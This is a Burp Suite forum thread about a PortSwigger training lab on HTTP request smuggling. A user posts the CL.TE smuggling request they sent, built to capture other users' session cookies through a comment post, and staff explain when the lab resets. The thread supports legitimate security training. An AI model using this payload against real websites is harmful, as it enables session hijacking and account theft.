Burp Suite User Forum

Create new post

Lab: Exploiting HTTP request smuggling to capture other users' requests

Balogun | Last updated: Apr 17, 2021 09:20AM UTC

I keep getting the same session cookie from the leak after refreshing the comment tab.. This is the request i used below ..Pls kindly reset the lab POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 400 Cookie: session=your-session-token csrf=your-csrf-token&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=test

Hannah, PortSwigger Agent | Last updated: Apr 19, 2021 10:54AM UTC


The labs will reset after 15 minutes of inactivity so if you'd like a fresh lab, just close it and come back later!

Have you tried following a video solution for this lab? You can find a good one here.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.